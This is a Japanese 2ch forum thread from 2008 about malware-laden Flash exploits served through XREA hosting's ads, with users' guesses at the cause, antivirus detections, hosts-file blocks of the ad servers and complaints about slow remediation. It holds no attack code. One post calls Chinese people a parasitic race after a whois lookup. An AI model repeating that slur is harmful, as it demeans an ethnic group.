さくらインターネット → [email protected]に連絡済み。返答なし。
XREA → 「対応中です」

報告乙。
やるじゃん。

なんかトロイに感染しまくってるんだけど、本当にこれxreaが原因？
ウィルスばらまいてるのに対応遅すぎないか？

>>796
1. 202.181.97.???が侵入されて、arp spoofing。
2. 202.181.97.153が直接侵入されて、改竄されている。

たしかに２つの可能性があるけど、、、

それよりもお客さんのサーバがアタックを受けているのは確実なんで
さくらインターネットには何よりも先にサーバを止めてほしい・・・

セキュリティーソフトが何も警告出さないので
逆に不安になってくるんだけど。
フラッシュプレイヤー最新にしてたら、
セキュリティーソフトも無反応？

>>820
>>697にも少し書いているけど
Flashプレーヤーのバージョンを確認して
そのバージョンの脆弱性を狙ったswfファイルを実行させようとする。

最新版だと該当するswfファイルがないから
何も実行されない。だから無反応でOK。

何度も書いてるけど、「現時点での話」だからなー

>>821
こういうピンポイントでトロイ配信してくるのって厄介だよね
担当者に十分な情報が伝わってないと、再現性無しでスルーされそうだし

s284めちゃくちゃだな
スパマー御用達鯖か？

裏から284に入ってきた俺涙目ｗ

>>821
ありがとう

セキュリティホールmemoにも出たから
対応するんじゃないかねぇ

とりあえずXREA+7日間お試しに申し込んでおいた

慎重すぎｗ
俺なんてよゆーでLayoutIgnoreURI *しちゃった。俺かっこいい。

次の鯖代2400円まであと2ヶ月、アクセス解析2000円は8ヶ月後。

アク解に金払うとどうなるん？とタダ使いの自分が聞いてみる

>>826
でたんだ

アクセス解析はただ画面隅のバナーが表示されなくなるだけ。
opera使いの人が常にアクセス解析のURLをリファラにして
アクセスしてきてたのでこちらも気になったのでバナーを消した。
しかしその人は相変わらず当該リファラを返してくる謎。

>>831
スパムスクリプトじゃね？

リファラを同じページとして送るオプションでもあるんでしょ？

http://stress.junos.mobi/graph.html?x_s284

犯人誰だよぼけが

>>816
IPAじゃなくて、情報なんとかセンター
そこじゃないと基本動かんよ
＞業界常識

>>783
Vistaじゃ動かんがなｗｗｗｗｗｗｗ

>>836


hostsに追加で委員ジャマイカ？
http://lineage.paix.jp/guide/security/hosts.txt

ウイルスホスト一覧

hostsだとIP直は防げないよね

>>816
> 2. 202.181.97.153の件
>XREA → 「対応中です」
DNSラウンドロビンから外すだけじゃん…。
何もやってないな。

>>839
常識的に考えてそんなのすぐできるわけないだろ。

できる

s143に比べればどの鯖も1万倍マシさ。

284死んだ

>>840
あなたの常識でいうすぐ出来ない理由を是非教えてください、
もちろん完璧な対応でなく、一時的な緊急非難措置が取れない理由です。

粘着君

DNSから202.181.97.153を切り離すのに何日かかるんですか

数年

xreaのサイトで広告がウイルス判定されたんだが。

まだ直ってないのか……
何やってんだほんと

24時間経ってもまだウィルスの対応が出来ないって…

24時間どころか

SWF_DLOADER.ADLW　が検出される＠VB2008
これやばいんじゃないの？

自分も何度もウィルス検索したりして心配になってるけど、
閲覧にくるお客さんが一番心配だよこの状態。

VBがやばいのでは？

無料で運営しているユーザは、ちゃんと注意書きをでかでかと書いておきましょうね
「サーバの広告ページを通じてマルウェアがダウンロードされるかも知れないので、
AdobeFlashPlayerプラグインは最新版にして下さいね」って

最新じゃない場合は見てからじゃ遅いと思うんだ。ｗ

つまり

とっとと対応しろやXREA！！

って事ですね。

>>855
気づいていないことにしてます。

みんな有料にすればいいじゃん（・∀・）ﾆﾔﾆﾔ

こんなに問題を放置するようなレン鯖に金と個人情報を渡す気にはなれません。

何を今更だと思う
前の時の方が、長期間だったし

前って何かあったの？

それは禁句。

戻りたい　戻れない　気持ちうらはら
とまどいはもう愛ね　そろそろ禁区

たまたま最新版入れといて良かった
いつも様子見するから

5年も前の話持ち出すなよ。
確かにあの時はたいへんだったけどさ。

>>862
検索しても出てこないはずなので、悶々として下さい

Vista+IE7の保護モードなら、セキュリティーホールでやられても、まず被害うけない

>>866
あの話はやばいよな
命がアブナイよ

お前らがデジロックに就職したら、きっとスゲェ良い仕事すんだろうなぁ

>>869
いまさら鮫島かよ

こんな胡散臭い会社（ほんとうに「会社」なのか？）にゃ、就職したくないな

頭の悪い書き込みだな

ほとんどがアルバイトでしょ。

まえのって上位回線が落ちた奴だっけ?

そりゃ、改竄広告を配信し続けるような会社のスレだからなぁ

ちょっと古いリンクを巡回してみたんだが、
今回の事件で課金した職wikiが多数でわろたｗ
xreaにとっては長期的に見て信用が落ちるよりも
お金が入るほうが得策だと判断したのかもしれんね。

http://japalink.com/?p=16
普通のXREAの紹介ページだけど、
日付が今日なのに広告問題がスルーされてる…

これって、新聞ネタにもなり得る問題だぞ

動きが無くてつまらん。

ここで騒いでいてもしょうがないと思うが
JPCERTなど相応の機関にたれこめ

だから、まかせた。

https://www.ipa.go.jp/about/inquiry/mailform01.html
ここに相談だ

全員が課金し終わるまで二週間はかかるだろうし対策はその後になります。ご了承しなさい。

>>880
セキュmemoに載ったからもう動いてるだろ

s284の運営は放棄したの？

FlashPlayerが古い場合、ブラウザ関係無くやられる。
ttp://www.virustotal.com/analisis/b9c9fb50aae160a0838d8da586f1b43d
検体は2日前に送ったんだが、NortonやMcAfeeやBitDefenderがスルー。

>>877 様
早速のご指摘ありがとうございます。
JAPALINK管理人

無料版と有料版のサーバの番号の違いって
どうすれば分かる？
とりあえずxreaの無料系はフィルタリングしようと思うんだが。

>>888
鯖番号での判別は事実上無理。
広告有りと無しのユーザーが混在している。

最初この件をこのスレで報告した奴を必死で叩いてたバカはなんだったんだろ

たたいてたやつが犯人なんじゃねーの？
もしくは関係者とか

仕込んだ内容からして中華が怪しいよ

>>807

>>888
広告サーバをフィルタリングすればいいんじゃね?
imgj.xrea.com
ad.xrea.com
j1.ax.xrea.com
hostsでサクっと。

IPで阻止可能なら感染したのは上記の名前を持つ5台中1台。
202.181.97.153
をピンポイントで。

VB2008でSWF_DLOADER.ADLWが検出されて隔離には成功したんだけど
駆除できなくて困ってるんだけど削除しても大丈夫なのかな？
ぐぐっても対応方法が出てこないし誰か教えてください

>>890
見直して笑ったｗ
叩きすぎだろｗｗ

>>895
削除するか http://pc11.2ch.net/sec/

kasperskyでも問題なく検出できる？ > SWF_DLOADER
本家のサイトのウィルス情報見ても
このウィルス情報見つけられないんだが。

>>898
できるよ。
検出名はベンダでバラバラなので
同じ名前で他社で探すのは無駄。

今北
三行で説明頼む

XREAの
広告に
ウイルス

どこに責任の元凶があるかなんて話はひとまず横に置くとして
ひとまずできる応急処置（ラウンドロビンから問題のサーバを除く等々）すら
せずに、ずっと放置してるからいかんのだよ。。。

財布がパンパンだぜ

PCブッ壊れたｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖｖVVVVVVVVVV
デジロックは弁償しろｖｖｖｖｖｖｖｖｖVVVVVVVVｖｖｖｖｖｖｖｖｖｖｖVVｖVVVVVｖｖｖVVVVVV

☆や☆だ☆よ☆

課金率が前月同比で300％越えた。
そもそも非課金ユーザーは少ないのですが。

能無しの運営君見てるか？
s284どうにかしとけよ

無料ユーザーと一緒の場所に詰めこまれて可哀想

http://stress.junos.mobi/graph.html?x_s61
http://stress.junos.mobi/graph.html?x_s51

え、なにこれ全鯖の無料版の広告にウィルスって事？

無料ユーザー ＝ 課金ユーザー

次のスレタイ楽しみ

>>909
必ずしもウイルスだと決まったわけじゃない

ブルース？

つまんね

もうウイルスで確定だろ

>>913
ﾊｹﾞﾜﾛﾀｗｗｗ

痛々しくて見てらんない

誰かこの件でニュー速にスレ立ててくれ

俺は立てないけど誰か〜〜、誰か〜〜

Xrea無料鯖の広告を見てｳｨｽﾙ感染
→Xreaを見てｳｨｽﾙ感染
→Xrea鯖むっちゃやばいです＞＜

ってなったら俺達VD経由で登録してる奴も困るんだぞおい
こっちは金払ってんだからな
Xreaのドメインを隠すためにドメイン買えって事かよおい！

ドメインくらい買えよ

だが断る

whois系のサイトから自サイトに飛んでくるのが目立ってきた
誰だ、悪い子探しに夢中なのは？

ウイルス感染ｗｗｗｗ
みｗなｗぎｗっｗてｗきｗたｗ

>>924
お前みたいなタコは巣に早くお帰り
つttp://yutori.2ch.net/news4vip/

今現在も何の対応もなし？
xreaのユーザーのサイトへの訪問者がウィルス感染のリスクに
晒されるわけであって、サーバ事業者として即時対応すべきことが
あるだろ。
これまでの経緯が事実なら相当な数のウィルスを拡散してることになるぞ？
これをこれだけの間放置するって本当にどうなってるの？

Firefox(Flashのバージョンは9.0.115.0)で広告ありのXREAサイトをみる→>>779みたいな警告→
→キャッシュ、クッキー削除→Flashを9.0.124.0に更新→ノートン2007を最新版にupdate→
→システムの完全スキャン→感染なし

という状況なんだが大丈夫だよな？

それがエクスリアクオリティ

FlashPlayerをいつも最新にしててよかった！

閲覧者が最新にしてるとは限らないからね。

おい！先日公開されたOperaUSBの最新版9.5のFlashが9.0.115のままだぞ！！！
気　を　つ　け　ろ！！
入れ替え必須だな

そもそもの元凶は、脆弱性のあるソフトウェアをリリースしたソフト会社さん
次に、脆弱性のあるプラグインを最新版にアップデートしない馬鹿な閲覧者さん
そして、一週間経っても汚染されたコードを除去する気配のない鯖会社さん

>>931
なんかOpenBSDに見えた

>>932
サイト運営者は無罪だよね？
ちゃんとバージョンアップしてるから、
問題が起こってることすら気づいてないよ。

しかしこれはそんなのんきな話ではないだろ

サーバー管理者は何してるんだ？

ウイルス事件というよりは管理人消失事件と呼ぶ方がふさわしい？

解決すれば、温故知新事件じゃない

管理人、もしかしてドバイでリゾート建設でもやってるんじゃね？

SquirrelMailで
>ERROR: Could not complete request.
>Unknown response from IMAP server: 1.* NO Cannot open message 591 * NO Cannot open message 592 * NO Cannot open message 593
ってエラーメッセージがでて
差出人　日付　件名
送信者不明　日付不明　（無題）
送信者不明　日付不明　（無題）
送信者不明　日付不明　（無題）
って状態なんだけどどしたらええの？
xreaコンパネで初期化しても変化無し
ウェブメールだと見られないけどPOPで読む分には問題なし
どういうことですかこれは？

s298落ちた？課金してからこんな現象に出会うの初めてだ。

s312も落ちた

と思った8時まで緊急メンテナンスらしいな

いつも大体どれぐらいで復帰するのかな？
200番台後半から300番台前半ぐらいのが落ちてるっぽい。

なるほど、おｋ

>>686
GoogleAnalyticsで確認したところ、俺のサイト利用者でFlashバージョンが
9.0.124以上なの14%しかいないよ、つまり8割以上のユーザが危険ってことになるのかな。
俺のとこはxrea+なんだけどね、いちお情報として。

ﾒﾝﾃﾅﾝｽ情報のRSSってちゃんと取れる？

今日の緊急メンテナンスって、上で騒いだ事への対応？

ウイルスコードが入ってるのは自動挿入広告か？
それとも手動挿入広告？

早く気付けば良かったorz...

XREAがアナウンスしてないんだから気付かないのも無理はない

PHPのページにPOSTしようとするとForbidden
自宅のPC以外から試したらPOSTできた
これ関係ある？
http://sb.xrea.com/archive/index.php/t-11627.html
自分は普通に国内大手ISPなんだが

このスレの半ばほど読めば似たようなレスがあるのだが。

>>950
>>414

>>951
おまえはたったこれだけのことができないのかｗ

そんな怒るなよ。

教えたろ君がいるかぎり、教えて君は現れる。

>>943
だいたい1ヶ月くらいで復帰するよ

ニュー速にスレ立てといた

http://namidame.2ch.net/test/read.cgi/news/1213502968/

　　　　　　　　　　　　　　　　　　　　　　　　　 刀、　　　　　　　　 　 , ヘ
　　　　　　　　　　　　　　　　　　／´￣｀ヽ ／: : : ＼＿＿＿＿＿／: : : : ヽ、
　　　　　　　　　　　　　　,.　-‐┴─‐- ＜＾ヽ、: : : : : : : : : : : : : : : : : : : : : : }
　　　　　　 　 　 　 　 ／: : : : : : : : : : : : : :｀.ヽl____: : : : : : : : : : : : : : : : : : ／
　　　　　,.　-──「｀: : : : : : : : :　:ヽ: : : : : : : : :＼ ｀ヽ￣￣￣ フ: : : : :／
　　 　／: :.,.-ｧ: : : |: : : : : : : : :　　　 :＼: : : : :: : : :ヽ　 ＼ 　 ／: : : :／
　　　￣￣／: : : : ヽ: : : . . . . . . . . . . .､ ＼=--: : : :.i　 ／　/: : : : :/
　　　　 ／: : 　　　 ∧: ＼: : : : : : : : : : ヽ: :＼: : : 〃}/　　/: : : : :/　　　　　　　　 、
.　　　 /: : /　　. : : :! ヽ: : l＼_＼／: : : : :＼: ヽ彡: : |　　/: : : : :/　　　 　 　 　 　 |＼
　　　/: : ｨ: : : : :.i: : | 　 ＼!___／ ヽ:: : : : : : :＼|:.:.:.:/:!　 ,': : : : /　 　 　 　 　 　 　 |: : ＼
　　 / ／ !: : : : :.ト‐|-　 　 ヽ　　　　＼: : : : : l::::__:' :/　 i: : : : :{　　　 　 　 　 　 　 |: : : :.ヽ
　　 l/ 　 |: : :!: : .ｌ: :|　　　　　　　 　 　 ＼: : : l´r. Y　　 {: : : : :丶＿＿＿＿＿__.ノ: : : : : :}
　　　　　 l: : :ｌ: : :ﾄ､|　　　　 　 　 ､＿__,ィ ヽ: :| ゝ ﾉ　 　 '.: : : : : : : : : : : : : : : : : : : : : : ／
　　　　　 |: : :ﾄ､: |: :ヽ ___,彡 　 　 ´￣´　　 ヽl-‐'　　　　 ＼: : : : : : : : : : : : : : : : : : イ
　 　 　 　 !: :从ヽ!ヽ.ﾊ=≠'　, /////　///u /　　　　　　　 　 ￣￣￣￣￣￣￣￣
　　　　　　V　 ヽ|　 　 }///　 r‐'⌒ヽ　　イ〉、
　　　　　　　　　　　 　 ヽ､______ｰ‐‐' ィ´　/:/:7rt‐---､　　　　　　　こ、これは>>956乙じゃなくて
　　　　　　　　　　　　　　　　　　ィ幵ﾉ　./:/:./:.! !: : : : :!｀ヽ　　　　　ポニーテールなんだから
　　　　　　　　　　　　　　r‐'T¨「 |: | !:.∨:/:./: :| |: : : : .l: : : :＼　　　変な勘違いしないでよね！
　　　　　　　　　　 　 　 /: : .|: :|　!:.!ィ¨¨ヾ、:.:/　!: : : : l: : : : : :.＼

XREAの広告にAdobe Flash Playerの脆弱性をついたスクリプトが混入
http://namidame.2ch.net/test/read.cgi/news/1213502968/

で、どこからどこまでのサーバーがヤバいんだよ。
s87が大丈夫なら問題ないぞ

鯖管早くなんとかしてくれよ

メンテ後ワードプレスでPOSTできない
デニってもできん

うほおおおお

無料の募集なんて辞めればいいのに馬鹿だな運営は

ここは鯖落ち状態がデフォなの？ｗ

管理を放棄したようです

http://stress.junos.mobi/graph.html?x_s51

ひっでｗｗｗｗｗｗｗｗｗｗｗｗ

>>964
失礼なことを言うな！
「デフォ」という用語では，いかにも利用者が設定を変更すれば変えられるみたいではないか！

>965
週末とはいえこれはひどいな

IPアドレス　61.238.148.112
リモートホスト　061238148112.ctinets.com

Registrant:
CTI
14-16/F, Trans Asia Centre, 18 Kin Hong
NT
NO CITY, NO STATE 99999
HK
Domain Name: CTINETS.COM
------------------------------------------------------------------------
Promote your business to millions of viewers for only $1 a month
Learn how you can get an Enhanced Business Listing here for your domain name.
Learn more at http://www.NetworkSolutions.com/
------------------------------------------------------------------------
Administrative Contact, Technical Contact:
Hong Kong Broadband Network [email protected]
16/F Trans Asia Ctr
18 Kin Hong St Hong, Kwai Chung
HK
852 2199 8833 fax: 852 2199 8877

Record expires on 31-May-2012.
Record created on 01-Jun-1998.
Database last updated on 15-Jun-2008 01:21:57 EDT.
Domain servers in listed order:
NS1O.CTIHK.COM 203.80.96.8
NS2O.CTIHK.COM 203.186.94.21

中国人は世界の寄生虫民族

> 14-16/F, Trans Asia Centre, 18 Kin Hong
トランスアジアセンター14〜16階、18禁本…？

18禁本(笑)

>>876
遅レスだけど

XREA利用中の某MMOのWikiの中の人として一言
今回のことは笑い事ではないよ

無料鯖でPukiwiki動く鯖少ないんだから、今後管理人に何かあっても
無料鯖までだめとなると金銭的な理由で管理できなくなった後の引継ぎ
の敷居が高くなる。

実際私は今後の管理引継ぎを諦めたよ

職wikiとかMMOとか、要らんこと主張しに来る人は何なの？

職wikiって何？
MMOは検索して分かったんだけど。

まぁいいじゃん進展なくて飽きてきたところだし。

roですね、わかります。
引き継ぎは身内で抱え込もうとせず募集かけるのもいいよ。

mediawikiが動かない鯖はよく聞くが、pukiwiki動かん鯖は気かないな。phpインストールされてれば動くはずだし。

XREAの広告にAdobe Flash Playerの脆弱性をついたスクリプトが混入
http://namidame.2ch.net/test/read.cgi/news/1213502968/

┌───────────────────────────────────
│39 □ ヤジロベー(福岡県) □ □ 2008/06/15(日) 15:28:35.06 ID:r1OSbV6j0 □
└───────────────────────────────────

まとめ

xreaのHP無料レンタル鯖には広告表示義務があり、
その広告はHP閲覧の都度５つの鯖からランダムで選ばれ表示される
今回そのうちひとつがハッキングされ、↑でそれが選ばれると
Flashplayer未更新だと問答無用でウィルスがダウンロードされる

しかもxreaは無料鯖でも独自ドメイン可なので
アドレスで判断してxreaだけ避けて通るというのも非常に困難な上
知らないうちに踏んでしまっている可能性も高い

最初に公式BBSに報告があったのは８日、
以降現在までxrea側からは対策どころかアナウンスすらなし

>>972
>>無料鯖でPukiwiki動く鯖少ない
そうなの？

無料のやつを全部追い出せば解決

>>972
PukiWikiを導入しているレンタルwikiを使うというのは？
（レンタルwikiだとプラグインとかを自由に導入できんが）

>>978
無料鯖の大半がPerlしか対応してないからじゃない？
Perlで動くWikiも一応あるが

>>977
何度もウザイよ

料金倍でも良いからちゃんとしたメンテして欲しいわ

xrea.com part132
http://pc11.2ch.net/test/read.cgi/hosting/1213512039/

俺も料金倍でもいい。
無料だから

無料は追い出されるだろｗ

料金倍にして無料だけ別に隔離ってのが一番なんだけどな

課金してる人が貰える無料スペースにも愛を下さい＞＜

>>983
乙

課金ユーザー激増の真っ直中でさらに料金値上げ容認の大合唱。
xrea運営超歓喜ｗｗｗ

土日は管理も休みか

鯖が安定するなら値上げはどうってことない

coreserverの二の舞になるだけだろ
安定せず値上げだけ
管理能力が上がるわけでもなく

同じ価格帯なのにどうしてsakuraの安定性が無いんだろう

埋めるか

995

996

997

998

999

1000

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。